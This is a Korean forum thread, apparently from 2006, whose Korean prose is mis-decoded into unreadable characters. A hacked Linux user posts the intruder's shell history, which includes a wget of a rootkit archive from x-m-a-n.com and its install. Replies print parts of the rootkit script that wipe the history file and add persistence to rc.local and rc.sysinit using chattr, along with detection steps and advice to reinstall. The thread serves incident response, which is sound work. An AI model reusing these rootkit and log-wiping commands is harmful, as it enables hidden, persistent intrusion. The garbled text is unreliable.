°øÁö»çÇ×
ÀÚÀ¯°Ô½ÃÆÇ
Á¤º¸°Ô½ÃÆÇ
¹æ¸í·Ï
344
228
994
75,227
  ÇöÀçÁ¢¼ÓÀÚ : 6 (ȸ¿ø 0)
Ȩ > Á¤º¸ÀÚ·á½Ç
   
Á¦ ¸ñ  [linux] ÇØÅ·À» ´çÇߴµ¥ .bash_historyÆÄÀÏ ³»¿ëÀÔ´Ï´Ù
±Û¾´ÀÌ  ¾Ó»óÇÑ»îÀÇÈ¥
³¯ Â¥
06-01-17 16:40
Á¶È¸(1284)
Æ®·¢¹é ÁÖ¼Ò : http://netcop.woobi.co.kr/bbs/tb.php/k_pds/12 
ÇØÅ·À» ´çÇߴµ¥ .bash_historyÆÄÀÏ ³»¿ëÀÔ´Ï´Ù

id
wget x-m-a-n.com/rk.tgz
tar xzf rk.tgz
rm -rf rk.tgz
cd .rk
./install
w
hostname
/sbin/ifconfig

ÀÌ·± ³»¿ëÀε¥ find¸í·ÉÀ¸·Î ¹éµµ¾î»èÁ¦Çصµ Á¶±Ý Áö³ª¸é ´Ù½Ã »ý±â°í
promiscÀÌ°Ô °è¼Ó ifconfig 3¹øÂ° ¶óÀο¡ »ý±â¸é¼­ ¹éµµ¾î°¡ °è¼Ó »ý¼ºÀÌ µË´Ï´Ù.
¾î¶»°Ô ÇØ¾ßÁÁÀ»Áö ¸ð¸£°Ú¾î¿©
¿ÏÀüÈ÷ »èÁ¦ÇÏ´Â ¹æ¹ýÁ» °¡¸£ÃÄ ÁÖ¼¼¿ä

============================================================================

wget x-m-a-n.com/rk.tgz

¹éµµ¾î ÇÁ·Î±×·¥¿¡´ëÇÑ ºÐ¼®..

echo "taking over the server..."
tar xvfz sshd.gz -C /
rm -rf /root/.bash_history /// root ÀÇ .bash_history ÆÄÀÏÀ» »èÁ¦.....
ln -s /dev/null /root/.bash_history // ±×¸®°í .bash_history ·Î±×ÈçÀûÀÌ ³²Áö ¾Ê°Ô ÀåÄ¡°ªÀ¸·Î º¸³½´Ù...

1.
# find /dev -type f
À§¿Í °°Àº ¸í·ÉÀ¸·Î ¾µµ¥¾ø´Â ÆÄÀϵé(-_-)ÀÌ Á¸ÀçÇÏ´ÂÁö È®ÀÎÇÕ´Ï´Ù. º¸Åë /dev/MAKEDEV µî°ú °°ÀÌ device ¸¦ °ü¸®ÇϰíÀÚ ÇÏ´Â ÆÄÀÏ ÀÌ¿ÜÀÇ °ÍÀÌ °Ë»öµÇ¸é ÀÏ´Ü ÀǽÉÇØºÁ¾ß ÇÕ´Ï´Ù. ±×¸®°í ½À¼º»ó µð·ºÅ丮¸íĪÀ» °ø¹é ÇѹÙÀÌÆ®(" ")³ª "..." µî°ú °°ÀÌ dot 3°³ Á¤µµ·Î »ý¼ºÇÏ¿© ½±°Ô ´«¿¡ ¶çÁö ¾Ê°Ô Çϱ⵵ ÇϹǷΠÀÌ·± ÇüÅÂÀÇ ÆÄÀÏÀ̳ª µð·ºÅ丮µµ ã¾Æº¸½Ã±â ¹Ù¶ø´Ï´Ù.

2.
# grep -v "^#" /etc/inetd.conf
À§¿Í °°Àº ¸í·ÉÀ¸·Î ºÒÇÊ¿äÇÑ(¶Ç´Â Å©·¡Ä¿°¡ Ãß°¡ÇÑ) ¼­¹ö¿¡ °üÇÑ ¼³Á¤ÀÌ Ãß°¡µÇ¾î ÀÖ´ÂÁö È®ÀÎÇÕ´Ï´Ù.

3.
# netstat -an | grep LISTEN
À§¿Í °°Àº ¸í·ÉÀ¸·Î ¼­¹ö¿¡ ¿­¸° Æ÷Æ®¸¦ È®ÀÎÇÏ¿© Àǽɰ¡´Â Æ÷Æ®°¡ ÀÖ´Ù¸é Æ÷Æ®¸¦ ¹°°í ÀÖ´Â µ¥¸óÀ» ã¾Æ º¾´Ï´Ù.

4.
/etc/passwd ÆÄÀÏÀ» ¿­¾î¼­ ÃÖ±Ù¿¡ Ãß°¡µÈ »ç¿ëÀÚ³ª ¾å¼¥ÇÏ°Ô ±âÁ¸ »ç¿ëÀÚÁ¤º¸ »çÀÌ¿¡ ¼û°ÜµÐ Å©·¡Ä¿ÀÇ ÀϹݰèÁ¤ÀÌ Á¸ÀçÇÏ´ÂÁö È®ÀÎÇÕ´Ï´Ù.

5.
½Ã½ºÅÛÀÇ ºÎÆ®½ºÅ©¸³Æ®(/etc °æ·Î ÇÏ´Ü)¿¡ ¹éµµ¾î¸¦ ½ÇÇàÇÏ´Â µîÀÇ ¾Ç¼ºÄڵ尡 Á¸ÀçÇÏ´ÂÁö È®ÀÎÇÕ´Ï´Ù.

6.
ÇÊ¿äÇÒ °æ¿ì ´ÙÀ½°ú °°ÀÌ find ¸í·ÉÀÇ ½Ã°£¿É¼ÇÀ» ÁÖ¾î ÃÖ±Ù¿¡ º¯°æµÈ ÆÄÀϵéÀ» ã¾Æº¼ ¼öµµ ÀÖ°Ú½À´Ï´Ù¸¸, Å©·¡Ä¿°¡ ÆÄÀÏ ¼öÁ¤ÀÏÀÚ±îÁöµµ º¯Á¶Çß´Ù¸é º°·Î À¯ÀÍÇÑ ¹æ¹ýÀÌ µÇÁö ¸øÇÒ ¼öµµ ÀÖ½À´Ï´Ù.
# find / -ctime -30 -type f

7.
Æ÷Æ®¸¦ ÀÌ¿ëÇÑ ¹éµµ¾î »Ó¸¸ ¾Æ´Ï¶ó ·çÆ®½©À» ¾òµµ·Ï ±¸¼ºµÈ ¹éµµ¾î°¡ ±¸¼ºµÇ¾î ÀÖÀ» ¼ö ÀÖÀ¸¹Ç·Î ½Ã½ºÅÛ ³»ÀÇ Set User ID(SUID) ÆÄÀϵéÀ» ÁË´Ù ÈȾîºÁ¼­ ¾Ç¼ºÄڵ峪 ¾Ç¼º½©ÀÌ ¾Æ´ÑÁö È®ÀÎÇÕ´Ï´Ù.


3Â÷ÀûÀÎ ±Ç°í
ħÀÔÀÚ°¡ ½´ÆÛÀ¯Àú ±ÇÇÑÀ» ȹµæÇß¾ú´Ù¸é ½Ã½ºÅÛÀ» À缳ġÇÏ´Â °ÍÀÌ Çʼö¶ó°í °¨È÷ ¸»¾¸µå¸®°í ½Í½À´Ï´Ù.
¾Æ½ÃµíÀÌ À¯´Ð½º °è¿­¿¡¼­ ½´ÆÛÀ¯Àú ±ÇÇÑÀº Àý´ëÀûÀÎ ÁöÀ§¿¡ ÀÖ½À´Ï´Ù. ¼ÒÇÁÆ®¿þ¾îÀûÀÎ ¾î¶°ÇÑ ÀÛ¾÷ÀÌ¶óµµ °¡´ÉÇÏ´Ù´Â À̾߱â ÀÔ´Ï´Ù.

°í»ý³¡¿¡ º¸¾È±¸¸ÛÀ» ¸ðµÎ ¸·¾Ò³ë¶ó°í Àå´ãÇÏ½Ç ¼öµµ ÀÖ°ÚÁö¸¸, /etc µð·ºÅ丮 ¹Ø¿¡ À§Ä¡ÇÑ ÆÄÀÏÀ̳ª °æ·ÎÁß ¾î´À Çϳª¶óµµ ÀÏ¹Ý »ç¿ëÀÚ¿¡°Ô ¾²±â±ÇÇÑÀÌ ºÎ¿©µÇ¾î ÀÖÀ» °æ¿ì Àç¼ö¾øÀ¸¸é ¶Ç ´Ù½Ã ¾Ç¸ùÀÌ ½ÃÀÛµÉ ¼ö ÀÖ½À´Ï´Ù. ħÀÔÀÚ°¡ ¾ÓÁõ¸Â°Ôµµ ÀϹݻç¿ëÀÚ·Î ·Î±×ÀÎ ÇÏ¿© /etc/rc.d/rc.local ÆÄÀϰú °°ÀÌ ½´ÆÛÀ¯Àú±ÇÇÑÀ¸·Î ÀÚµ¿À¸·Î ½ÇÇàµÇ´Â ½ºÅ©¸³Æ®ÆÄÀÏ(/etc/sysconfig/network µî ´ëºÎºÐÀÇ ½ºÅ©¸³Æ®)¿¡ rm -rf / ¶ó´Â ÁÙÀ» »ðÀÔÇÏ°ÔµÇ¸é ¾ÆÁÂÁÖ~ Àç¹ÌÀÖ´Â »çŰ¡ ¹ú¾îÁö°ÚÁö¿ä. ±×¸¸Å­ ½´ÆÛÀ¯Àú±ÇÇÑÀ» ÇѹøÂë ÀÒÀº ¼­¹ö¶ó¸é 99%ÀÌ»ó ½Å·ÚÇÒ ¼ö ¾ø½À´Ï´Ù. ÆÄÀÏÀÇ ¹«°á¼ºÀ» È®ÀÎÇÒ ¼ö ÀÖ´Â tripwire µîÀ» »ç¿ëÇÏÁö ¾Ê´ø ¼­¹ö¶ó¸é ¹«Á¶°Ç À缳ġÇÏ½Ã´Â°Ô ÁÁ½À´Ï´Ù.


·çÆ® ŶÀÌ ±ò·ÁÀÖÀ» °æ¿ì¿¡ ´ëÇØ¼­ À̾߱âÇϰí ÀÖ½À´Ï´Ù.

shadow passwd °¡ Ç®¸®°í, name daemon, ps ,top , inetdµî ¼ö¸¹Àº µ¥¸óÀ» ¹Ù²Ù¾î ³õ°í¿ä. Áõ»óÀ¸·Î´Â w , who µî ÇöÀç »ç¿ëÀÚ ÇöȲÀ» ÀüÇô º¸½Ç¼ö ¾ø°í top ¸í·ÉÀ» ¾²¸é È­¸éÀÌ ¾È³ª¿Ã °Ì´Ï´Ù.

ÆÐ½º¿öµå È­ÀÏÀ» Àß »ìÆì º¸¼¼¿ä. ÃÖ±Ù¿¡ ¸¸µé¾îÁø UID °¡ ³ôÀº °èÁ¤ºÎÅÍ ±×·¯´Ï±î tail -15 /etc/passwd ÇØº¸½Ã¸é µÉ°Ì´Ï´Ù. ¸ð¸£´Â °èÁ¤ÀÌ Àְųª ±×·¯½Ã¸é °èÁ¤ dir·Î °¡º¸¼¼¿ä. ¸¸¾à °èÁ¤¿¡ lrk.tgz È­ÀÏÀÌ ÀÖ´Ù¸é ÀÌ¹Ì ÇØÅ·´çÇϰí, Áß¿äÇÑ µ¥¸ó ´ëºÎºÐÀ» ¹Ù²Ù±¸ ³­ µÚ ÀÔ´Ï´Ù.

µé¾î ¿À´Â ¹æ¹ýÀº FTP·Î Á¢¼ÓÇØ¼­ ROOT±ÇÇÑÀ» ȹµæÇؼ­ ´ç´çÇÏ°Ô °èÁ¤À» ¸¸µçÈÄ lrk.tgz¸¦ ftp·Î ¾÷·ÎµåÈÄ ½ÇÇà½ÃŲÈÄ »ç¶óÁý´Ï´Ù. ÀÌ°É º¹±¸ ÇÒ·Á¸é, linux ¸¦ ´Ù½Ã Install ½ÃŰ¼Å¾ß ÇÕ´Ï´Ù. ¹°·Ð lrk/install À» º¸¸é ¹«¾ùÀ» ¹Ùf´ÂÁö ¾Ë¼ö ÀÖÀ¸´Ï±î ±×°Í¸¸ ±¸Çϼż­ ´Ù½Ã±î¼Åµµ µË´Ï´Ù. °³Àοë ÄÄÇ»ÅÍ¿¡ ¼­¹ö¿¡ ±ò¸° °ÍÀ̶û °°Àº ¹öÀüÀÇ Linux¸¦ ¼³Ä¡ÇϽðí ÇÁ·Î±×·¥µéÀ» µ¤¾î ¾²¼Åµµ µÇÁö¸¸. install¿¡ ½á Àִ°ŠÀ̿ܿ¡ ´Ù¸¥°Íµµ ¼³Ä¡ ÇßÀ»¼öµµ ÀÖÁö¶§¹®¿¡ ´Ù½Ã ¼³Ä¡ÇϽô°ÍÀÌ ÁÁ½À´Ï´Ù.

¿ø·¡ Çѹø ÇØÅ·´çÇϸé /home°ú /etc¸¸ ¹é¾÷¹Þ°í ³ª¸ÓÁö´Â ³¯·Á¹ö¸®´Â°Ô °¡Àå ¾ÈÁ¤ÇÏÁÒ. ÆÄƼ¼Ç ´Ù½Ã ÀâÀ» Çʿ䵵 ¾ø°í Æ÷¸Ë½ÃųÇʿ䵵 ¾øÀÌ, ±×³É µ¤¾î ¾²¸é µÇ±¸¿ä. ±×Àü¿¡ /etc ¸¦ ¹é¾÷ ¹ÞÀ¸¼Å¼­ /home ¹Ø¿¡ ³Ö¾î ³õÀ¸½Ã±â ¹Ù¶ø´Ï´Ù. ±×¸®°í ´Ù½Ã /etc¿¡¼­ text·Î µÈ ¼³Á¤È­ÀÏ µé¸¸ Copy ÇÏ½Ã¸é µË´Ï´Ù. Àý´ë binary File Àº Copy ÇÏ½Ã¸é ¾ÈµË´Ï´Ù. ( -

¾Æ·¡´Â ½Ã½ºÅÛ ÆÄÀϵéÀ» °¨¿°....º¯Á¶...
echo "Gata am terminat de instalat programele..."
cd ..
rm -rf .rk
rm -rf x3.gz
echo "E pe terminate rootarea ..."
/usr/lib/setup
/usr/bin/chattr -i /etc/rc.d/rc.sysinit >/dev/null
/usr/bin/chattr -i /etc/rc.d/rc.local >/dev/null
echo "/usr/lib/setup" >> /etc/rc.d/rc.sysinit
echo "/usr/lib/setup" >> /etc/rc.d/rc.local
/usr/bin/chattr +i /etc/rc.d/rc.local >/dev/null
/usr/bin/chattr +i /etc/rc.d/rc.sysinit >/dev/null
echo "Be Strong Baby :-) CTRL+C"

Á¦¼³Ä¡ Çϼ¼¿ä....
   
Copyright ¨Ï DBuser.net. All rights reserved.